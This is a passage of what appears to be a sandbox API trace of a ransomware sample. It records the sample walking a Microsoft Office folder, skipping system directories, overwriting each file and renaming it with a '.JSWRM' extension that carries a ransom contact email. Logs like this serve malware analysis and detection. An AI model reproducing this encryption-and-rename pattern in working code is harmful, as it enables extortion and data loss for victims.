lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.814] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.828] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.828] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.830] CloseHandle (hObject=0x238) returned 1 [0141.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.832] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b38968, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b38968, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13d7c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FLYER.XML", cAlternateFileName="")) returned 1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2=".") returned 1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="..") returned 1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="...") returned 1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="windows") returned -1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="recovery") returned -1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="perflogs") returned -1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="documents and settings") returned 1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="system volume information") returned -1 [0141.832] lstrcmpiW (lpString1="FLYER.XML", lpString2="msocache") returned -1 [0141.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.XML", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER.XML", lpUsedDefaultChar=0x0) returned 9 [0141.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.XML", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER.XML", lpUsedDefaultChar=0x0) returned 9 [0141.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.834] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=81276) returned 1 [0141.834] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.834] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x13d70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x13d70, lpOverlapped=0x0) returned 1 [0141.840] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.840] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x13d70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x13d70, lpOverlapped=0x0) returned 1 [0141.840] CloseHandle (hObject=0x238) returned 1 [0141.840] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.841] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b38968, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b38968, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x369a8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FLYER11.POC", cAlternateFileName="")) returned 1 [0141.841] lstrcmpiW (lpString1="FLYER11.POC", lpString2=".") returned 1 [0141.841] lstrcmpiW (lpString1="FLYER11.POC", lpString2="..") returned 1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="...") returned 1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="windows") returned -1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="recovery") returned -1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="perflogs") returned -1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="documents and settings") returned 1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="system volume information") returned -1 [0141.842] lstrcmpiW (lpString1="FLYER11.POC", lpString2="msocache") returned -1 [0141.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER11.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER11.POC", lpUsedDefaultChar=0x0) returned 11 [0141.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER11.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER11.POC", lpUsedDefaultChar=0x0) returned 11 [0141.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.843] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=223656) returned 1 [0141.843] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.843] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.854] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.854] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.855] CloseHandle (hObject=0x238) returned 1 [0141.855] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.856] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b38968, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b38968, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b5ebb7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe498e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FLYER98.POC", cAlternateFileName="")) returned 1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2=".") returned 1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="..") returned 1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="...") returned 1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="windows") returned -1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="recovery") returned -1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="perflogs") returned -1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="documents and settings") returned 1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="system volume information") returned -1 [0141.856] lstrcmpiW (lpString1="FLYER98.POC", lpString2="msocache") returned -1 [0141.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER98.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER98.POC", lpUsedDefaultChar=0x0) returned 11 [0141.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER98.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER98.POC", lpUsedDefaultChar=0x0) returned 11 [0141.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.857] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=936334) returned 1 [0141.857] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.857] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.871] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.871] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.871] CloseHandle (hObject=0x238) returned 1 [0141.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.872] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b5ebb7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b5ebb7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b5ebb7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd988, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FLYERHM.POC", cAlternateFileName="")) returned 1 [0141.872] lstrcmpiW (lpString1="FLYERHM.POC", lpString2=".") returned 1 [0141.872] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="..") returned 1 [0141.872] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="...") returned 1 [0141.872] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="windows") returned -1 [0141.872] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="recovery") returned -1 [0141.873] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="perflogs") returned -1 [0141.873] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="documents and settings") returned 1 [0141.873] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.873] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="system volume information") returned -1 [0141.873] lstrcmpiW (lpString1="FLYERHM.POC", lpString2="msocache") returned -1 [0141.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYERHM.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYERHM.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYERHM.POC", lpUsedDefaultChar=0x0) returned 11 [0141.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYERHM.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYERHM.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYERHM.POC", lpUsedDefaultChar=0x0) returned 11 [0141.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYERHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyerhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.875] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=55688) returned 1 [0141.875] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.875] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd980, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xd980, lpOverlapped=0x0) returned 1 [0141.880] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.880] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd980, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xd980, lpOverlapped=0x0) returned 1 [0141.880] CloseHandle (hObject=0x238) returned 1 [0141.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYERHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyerhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYERHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyerhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.882] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b5ebb7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b5ebb7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b5ebb7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x56ce, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FOLDPROJ.DPV", cAlternateFileName="")) returned 1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2=".") returned 1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="..") returned 1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="...") returned 1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="windows") returned -1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="recovery") returned -1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="perflogs") returned -1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="documents and settings") returned 1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="system volume information") returned -1 [0141.882] lstrcmpiW (lpString1="FOLDPROJ.DPV", lpString2="msocache") returned -1 [0141.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOLDPROJ.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FOLDPROJ.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FOLDPROJ.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FOLDPROJ.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\foldproj.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.883] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22222) returned 1 [0141.883] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.883] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x56c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x56c0, lpOverlapped=0x0) returned 1 [0141.886] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.886] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x56c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x56c0, lpOverlapped=0x0) returned 1 [0141.886] CloseHandle (hObject=0x238) returned 1 [0141.887] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FOLDPROJ.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\foldproj.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FOLDPROJ.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\foldproj.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.888] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b5ebb7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b5ebb7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b5ebb7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FOLDPROJ.XML", cAlternateFileName="")) returned 1 [0141.888] lstrcmpiW (lpString1="FOLDPROJ.XML", lpString2=".") returned 1 [0141.888] 